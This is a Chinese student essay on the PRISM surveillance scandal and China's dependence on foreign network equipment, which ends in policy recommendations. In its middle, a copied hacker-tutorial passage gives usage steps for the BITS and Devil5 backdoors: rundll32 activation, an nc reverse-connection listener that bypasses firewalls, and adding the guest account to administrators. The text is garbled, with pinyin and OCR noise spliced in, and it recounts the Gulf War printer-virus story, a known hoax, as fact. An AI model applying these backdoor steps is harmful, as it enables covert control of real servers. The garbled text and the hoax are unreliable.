棱鏡門對我國信息安全現(xiàn)狀思考(共7頁)

1、“棱鏡(lngjng)門”對我國信息安全現(xiàn)況(xin kun)的思考信息安全（保密(bo m)方向）李朋林2013年始，美國CIA前雇員斯諾登將數(shù)量巨大的機密文件公之于世，披露了美國龐大情報監(jiān)控的冰山一角。其中美國國安局（NSA）和聯(lián)邦調(diào)查局（FBI）經(jīng)由代號為“棱鏡”（PRISM）的互聯(lián)網(wǎng)信息篩選項目最為引人注目，美國情報部門直接從九大互聯(lián)網(wǎng)企業(yè)中獲取用戶數(shù)據(jù)。而隨著“棱鏡門”的持續(xù)發(fā)酵，更多的監(jiān)控丑聞被曝光，作為美國在亞太乃至全球最大的戰(zhàn)略競爭對手，我國網(wǎng)絡(luò)也遭到了美情報部門持續(xù)的攻擊和竊聽。從目前已經(jīng)曝光的文件來看，至少從2009年開始，美國政府便發(fā)動黑客行動侵入我國的網(wǎng)絡(luò)，其攻擊目標達

2、到上百個，包括清華大學主干網(wǎng)，香港中文大學，特區(qū)政府等上百個國家部委，企事業(yè)單位，院校。來自國家互聯(lián)網(wǎng)應(yīng)急中心（CNCERT）的數(shù)據(jù)顯示，從2013年1月1日至2月28日不足60天的時間里，境外6747臺木馬或僵尸網(wǎng)絡(luò)控制服務(wù)器控制了中國境內(nèi)190萬余臺主機；其中位于美國的2194臺控制服務(wù)器控制了中國境內(nèi)128.7萬臺主機，無論是按照控制服務(wù)器數(shù)量還是按照控制中國主機數(shù)量排名，美國都名列第一。我們有理由相信，網(wǎng)絡(luò)入侵不但造成了大量的經(jīng)濟損失，更對我國的國家安全造成了嚴重的隱患和巨大的傷害。由此引發(fā)了對我國信息安全的思考，我國龐大的計算機網(wǎng)絡(luò)是否牢靠？我國計算機網(wǎng)絡(luò)最致命的弱點是什么？我國的信

3、息安全發(fā)展如何掙脫瓶頸？從目前以掌握的資料來看，對于我國計算機網(wǎng)絡(luò)的隱患和傷害暫時是無法避免的，因為美國作為互聯(lián)網(wǎng)的創(chuàng)始人，掌握有得天獨厚的信息優(yōu)勢和便利條件。目前因特網(wǎng)的主根服務(wù)器在美國，其余12臺輔根服務(wù)器有9臺在美國，2臺在歐洲，1臺在日本。在主根服務(wù)器系統(tǒng)上還有一個更高級的、隱藏著的母服務(wù)器，地點也在美國。全世界所有的頂級域名都是由這臺母服務(wù)器來確定的，即使是中國的頂級域名.cn也同樣依賴于根服務(wù)器，所以中國因特網(wǎng)是否可用，控制權(quán)在美國手中；而且，這種情況在相當長的時間里還很難改變。此外，我國計算機及網(wǎng)絡(luò)信息系統(tǒng)使用的主要操作系統(tǒng)和芯片、數(shù)據(jù)庫、路由器等核心技術(shù)，以及互聯(lián)網(wǎng)領(lǐng)域的核心基

4、礎(chǔ)服務(wù)等，也都掌握在美國手中。國內(nèi)政府部門和企業(yè)對外國品牌的電子產(chǎn)品、信息技術(shù)產(chǎn)品過分依賴。據(jù)報道，在涉及政府、海關(guān)、郵政、金融、鐵路、民航、醫(yī)療、軍警等國家關(guān)鍵信息基礎(chǔ)設(shè)施的建設(shè)中，頻頻出現(xiàn)美國“八大金剛”(思科、IBM、谷歌、高通、英特爾、蘋果、甲骨文、微軟)的影子，特別是美國思科參與了中國幾乎所有大型網(wǎng)絡(luò)項目的建設(shè)這種情形，無疑對我國信息安全構(gòu)成了潛在威脅。在我看來，對于我國信息安全的最大危害則是植入到各個終端中的后門。后門程序一般是指那些繞過安全性控制而獲取對程序或系統(tǒng)訪問權(quán)的程序方法。在軟件的開發(fā)階段，程序員常常會在軟件內(nèi)創(chuàng)建后門程序以便可以修改程序設(shè)計中的缺陷。但是，如果這些后門被

5、其他人知道，或是在發(fā)布軟件之前沒有刪除后門程序，那么它就成了安全風險，容易被黑客當成漏洞進行(jnxng)攻擊。典型的如線程插入后門:這種后門在運行時沒有進程,所有網(wǎng)絡(luò)操作均播入到其他應(yīng)用程序的進程中完成。也就是說，即使受控制端安裝的防火墻擁有“應(yīng)用程序訪問(fngwn)權(quán)限”的功能，也不能對這樣的后門進行有效的警告和攔截，也就使對方的防火墻形同虛設(shè)。使用(shyng)時用3389登錄上肉雞，確定你有SYSTEM的權(quán)限，將BITS.DLL拷貝到服務(wù)器上，執(zhí)行CMD命令： 4 #R Br Arundll32.exebits.dll,install這樣就激活了BIST，程序用這個特征的字符來辨認使

6、用者，也就相當于你的密碼了，然后卸載：rundll32.exe BITS.dll,Uninstall這是最簡單的使用，這個后門除了隱蔽性好外，還有兩大特點是非常 值得借鑒的：端口復用和正反向連接。端口復用就是利用系統(tǒng)正常的TCP端口通訊和控制，比如80、139等，該后門有個非常大的好處就是非常隱蔽，不用自己開端口也不會暴露自己的訪問，因為通訊本身就是系統(tǒng)的正常訪問!另一個是反向連接，這個很常見，也是后門中一個經(jīng)典思路，因為從服務(wù)器上主動方問外邊是不被禁止的，很多很歷害的防火墻就怕這點!BITS的正向連接很簡單(jindn)，大家可以參考它的README，這種方式在服務(wù)器沒有防火墻等措施的時候很

7、管用，可以方便地連接，但是遇到有防火墻這樣的方式就不靈了，得使用下面的反向連接方式： 70 +g3l在本地使用(shyng)NC監(jiān)聽(如：nc -l -p 1234)用NC連接目標(mbio)主機的任何一個防火墻允許的TCP端口(80/139/445)輸入激活命令：email=hkfxdancewithdolphinrxell::2222hkfxdancewithdolphinrxell::2222/email q/hQ , 4目標主機的CMD將會出現(xiàn)NC監(jiān)聽的端口2222，這樣就實現(xiàn)了繞過防火墻的功能了。又如Devil5也是線程插入式的后門，和BITS不同的是它可

8、以很方便的在GUI界面下按照自己的使用習慣定制端口和需要插入的線程，適合對系統(tǒng)有一定了解的使用都使用，由于是自定義插入線程，所以它更難被查殺，下面我們來看看它的使用。使用它自帶的配置程序EDITDEVIL5.EXE對后門進行常規(guī)的配置,包括控制端口、插入線程、連接密碼、時間間隔等方面關(guān)鍵點是對插入線程的定制，一般設(shè)置成系統(tǒng)自帶的SVCHOST，然后運行后門就可以控制了。我們用TELNET連接上去，連接的格式是：TELNET * 定制的端口，它和其他后門不同之處在于連接后沒有提示的界面，每次執(zhí)行程序也是分開的，必須要每次都有輸入密碼，比如我們丟掉了服務(wù)器和管賬戶，可以激活GUEST后再將GUES

9、T加到管理員權(quán)限，記得每次執(zhí)行命令后加上“密碼”就可以了：net localgroup administrators guest /add hkfx，然后你又可以控制服務(wù)器了。很明顯示，同榕哥的BITS相比，DEVIL5有一些缺陷：不能通過系統(tǒng)自帶端口通訊、執(zhí)行命令比較麻煩，需要每次輸入密碼而且不回顯示輸入內(nèi)容，很容易出錯。但是，它有自己的優(yōu)勢：插入線程可以自已定制，比如設(shè)置IE的線程為插入的目標就比較難被查殺：自己提供了專門的查殺工具DELDEVIL5.exe，幫助防護者清理系統(tǒng);而且它可以任意改名和綁定，使用靈活性上比BITS強以上兩種都是較為典型的后門，而且均功能強大，難以控制。而假如這

10、兩種后門被植入在我黨政軍機關(guān)的電子系統(tǒng)中，其殺傷力是無法估量的?？梢钥吹?，在信息安全領(lǐng)域，我國無疑被美國卡住了喉嚨，大量依賴的設(shè)備，網(wǎng)絡(luò)，機制都受到美方或多或少的參與。特別是在當今這個互聯(lián)網(wǎng)飛速發(fā)展的年代，幾乎所有工作都難以離開電腦與網(wǎng)絡(luò)。我們很難說美方賣給我們的設(shè)備與系統(tǒng)上沒有留下后門程序，因為現(xiàn)在這些產(chǎn)品都是源碼封裝的，以美國為首的西方世界不會也也不可能會交給我們產(chǎn)品的源代碼，所以很難進行逆向開發(fā)，就算(ji sun)美方留下了后門我們也無法發(fā)現(xiàn)，甚至后門被開啟，數(shù)據(jù)外泄時也很難被發(fā)現(xiàn)。在目前新軍事變革背景(bijng)之下，我軍為打贏下一場信息化局部戰(zhàn)爭，部隊由摩托化向機械化信息化轉(zhuǎn)變，

11、從量變轉(zhuǎn)為質(zhì)變(zhbin)。特別是我軍這些年來大力發(fā)展的C41指揮系統(tǒng)，航空航天偵查設(shè)備，復雜電磁對抗設(shè)備等大量高精尖武器裝備。其關(guān)鍵數(shù)據(jù)節(jié)點之間離不開各個數(shù)據(jù)鏈網(wǎng)絡(luò)的支持，空天之間，空地之間，地地之間，大量電子設(shè)備和數(shù)據(jù)脫離電腦網(wǎng)絡(luò)便無法工作。設(shè)想一下，這些關(guān)鍵節(jié)點，如指揮中心，衛(wèi)星接收站，網(wǎng)絡(luò)交換機，數(shù)據(jù)服務(wù)器等在戰(zhàn)爭時遭到了敵方開啟后門進行攻擊，網(wǎng)絡(luò)防火墻形同虛設(shè)，出現(xiàn)了指揮部與前線部隊失去聯(lián)系，發(fā)射出去的導彈失去控制，指揮網(wǎng)絡(luò)遭到阻塞無法及時了解前線態(tài)勢，前線部隊收到敵方發(fā)來的錯誤指令，這樣的戰(zhàn)爭能打贏么？而在經(jīng)濟上，如今各大銀行，證券，保險，社會養(yǎng)老醫(yī)療系統(tǒng)都有自己的電子檔案系統(tǒng)和

12、數(shù)據(jù)庫，用戶個人信息，儲值，繳費記錄，交易記錄等都存儲在各家的服務(wù)器上。假如某天我國的金融系統(tǒng)遭到敵對勢力的破壞，利用植入在服務(wù)器制造商設(shè)備上的后門對服務(wù)器上的海量數(shù)據(jù)進行竊取、刪除、篡改。若主管部門未及時發(fā)現(xiàn)并采取果斷措施（如切斷各服務(wù)器之間的網(wǎng)絡(luò)連接，進行物理以及電磁隔離，并且迅速恢復原始數(shù)據(jù)），其所引起的社會動蕩和負面效應(yīng)更是無法想象的，因為這樣的攻擊行為將會徹底撼動社會穩(wěn)定的根基和人民生活的源泉。在民生上，網(wǎng)絡(luò)安全更凸顯出重要性和脆弱性，涉及民生的如國家電網(wǎng)、中石油、中石化，中國移動、中國電信、各大發(fā)電廠，水壩水庫等。這些單位對于安全的防護性在意識上并不是特別強，但是由于自身的工作需要

13、和社會信息化的發(fā)展趨勢，需要大量的進口網(wǎng)絡(luò)設(shè)備，平日里的運行正常運作維護也都是通過各個計算機網(wǎng)絡(luò)進行。但是只要這些進口的設(shè)備中被植入后門，若在國家關(guān)鍵時刻后門被開啟，出現(xiàn)大規(guī)模停水停電，失去通訊信號等這些極度令人民群眾心理恐慌的事情，所引發(fā)的社會動蕩也是不可小覷。以上這些并不是危言聳聽，早在海灣戰(zhàn)爭(zhnzhng)時期，美軍就已經(jīng)發(fā)動過類似的后門攻擊，并且取得了理想的戰(zhàn)果。當時伊拉克陸軍一觸即潰，整師軍隊一夜消失，而空軍更象從來沒有存在過一樣安靜度過整個美伊戰(zhàn)爭。在日后的解密文件中，我們才發(fā)現(xiàn)了伊拉克空軍消失的真正原因。海灣戰(zhàn)爭爆發(fā)前，美國情報部門獲悉，伊拉克從法國購買了一種用于防空系統(tǒng)的新

14、型電腦打印機，準備通過約旦首都安曼偷運到巴格達。美國在安曼的特工人員立即行動，偷偷把一套帶有病毒的同類芯片換裝到這種電腦打印機里，從而通過打印機使病毒侵入到了伊拉克軍事指揮中心的主機。據(jù)稱，微機芯片是美國馬里蘭州米德堡國家安全局設(shè)計的，病毒名為AFgl。當美國領(lǐng)導的多國部隊發(fā)動“沙漠(shm)風暴”行動，空襲伊拉克時，美軍用無線遙控裝置激活了隱藏的病毒，致使伊拉克的防空系統(tǒng)陷入(xinr)了癱瘓。國不可一日無防，兵不可一日不練。從以上那些觸目驚心的數(shù)據(jù)以及血淋淋的現(xiàn)實面前，我們不得不承認：假如沒有在信息安全上下大力氣進行改良優(yōu)化，思考對策與方法，那么很有可能在下一場戰(zhàn)爭來臨之時，我們無力一戰(zhàn)。

15、甚至連戰(zhàn)爭的預兆都沒有，敵方僅僅動用網(wǎng)絡(luò)部隊，通過后門程序，就已經(jīng)摧垮了我國的經(jīng)濟和民生基礎(chǔ)，閹割掉了我國的戰(zhàn)爭潛力。那么我們對于目前嚴峻的信息安全形勢，又該有如何的對策呢？我認為應(yīng)該分為三點：大力發(fā)展支持我國的電子設(shè)備國有化。現(xiàn)在市場上所大量存在的網(wǎng)絡(luò)電子設(shè)備，核心技術(shù)都是國外大型公司。以思科為例，思科目前在中國骨干網(wǎng)擁有超高的市場份額，其占據(jù)著中國電信163骨干網(wǎng)70%以上的份額，同時還把持著其所有的超級節(jié)點和絕大部分的普通核心節(jié)點；思科占據(jù)中國聯(lián)通169骨干網(wǎng)的份額更是達到了80%以上，把持著所有的超級核心節(jié)點、國際交換節(jié)點、國際匯聚節(jié)點和互聯(lián)互通節(jié)點。在“棱鏡門”之前，思科就已經(jīng)爆出了

16、諸多安全漏洞，如今的事件更是說明了由國外公司控制我國網(wǎng)絡(luò)的不可靠性，因此必須大力自主創(chuàng)新，使關(guān)鍵設(shè)備關(guān)鍵技術(shù)國產(chǎn)化，不會受制于人?，F(xiàn)在市場上發(fā)展比較好的如華為，中興，也都受到了國家的政策和待遇的支持。近日，中國聯(lián)通完成了“China169”骨干網(wǎng)江蘇無錫節(jié)點的核心集群路由器的搬遷工程，這也是通信業(yè)界首個思科CRS集群路由器的搬遷工程，其核心設(shè)備均采用了華為公司的產(chǎn)品。完善信息安全監(jiān)控管理機制，及時發(fā)現(xiàn)國內(nèi)計算機網(wǎng)絡(luò)上的異常。國內(nèi)如今的互聯(lián)網(wǎng)用戶已經(jīng)接近十億，每天在國內(nèi)的網(wǎng)絡(luò)上都可以用風起云涌來形容。各色的新聞，突發(fā)事件，還有數(shù)不勝數(shù)的掃描，攻擊事件。其中一部分是電腦愛好者的小惡作劇，但還有相當

17、一部分攻擊來源于境外，而且其攻擊的目標性非常明確，均是企事業(yè)單位(dnwi)，科研單位和高校主干網(wǎng)絡(luò)。 因此，建立起相應(yīng)的信息安全監(jiān)控管理機制迫在眉睫，我國現(xiàn)有的機構(gòu)為國家互聯(lián)網(wǎng)應(yīng)急中心，但是(dnsh)卻仍然具有突發(fā)網(wǎng)絡(luò)事件滯后，難以及時處理等特點。雖然公安部門也有相應(yīng)的計算機網(wǎng)絡(luò)監(jiān)控，但是與工信部的互聯(lián)網(wǎng)應(yīng)急中心各為一家，此外還有國家計算機病毒數(shù)據(jù)庫等其他單位。難以形成一個統(tǒng)一高效的監(jiān)控處理體系。我以為，借鑒去年十八大后將海洋局的海監(jiān)、農(nóng)業(yè)部的漁政、海關(guān)總署的緝私、公安部的海警,整合起來形成一支隊伍的經(jīng)驗，也可以對國內(nèi)的信息安全監(jiān)管機構(gòu)進行整合升級，以提高其反應(yīng)速度和處理能力。組建我國的網(wǎng)

18、絡(luò)部隊，不打無準備之戰(zhàn)。2010.5.21美國國防部長蓋茨宣布成立美軍網(wǎng)絡(luò)司令部（US Cyber Command），旨在為未來可能的網(wǎng)絡(luò)戰(zhàn)爭提前(tqin)進行準備，美軍網(wǎng)絡(luò)司令部擁有千余名信息戰(zhàn)專家，包括工程師、物理學家、分析家、數(shù)學家、語言學家、計算機專家和數(shù)據(jù)流專家等。它由諸軍種聯(lián)合司令部、下屬各軍種網(wǎng)絡(luò)司令部和作戰(zhàn)部隊共同組成，其中包括陸軍的第9司令部和第1信息戰(zhàn)司令部（地面）、海軍的網(wǎng)絡(luò)防御作戰(zhàn)司令部和信息戰(zhàn)司令部、空軍的第67網(wǎng)絡(luò)戰(zhàn)聯(lián)隊和第688信息戰(zhàn)聯(lián)隊、海軍陸戰(zhàn)隊的網(wǎng)絡(luò)空間司令部等。其在網(wǎng)絡(luò)上的攻擊能力不可小覷。鑒于此，我國也應(yīng)成立相應(yīng)的網(wǎng)絡(luò)部隊，以應(yīng)對未來不可預測的突發(fā)事件，我軍現(xiàn)在各主力部隊均有電子對抗部隊，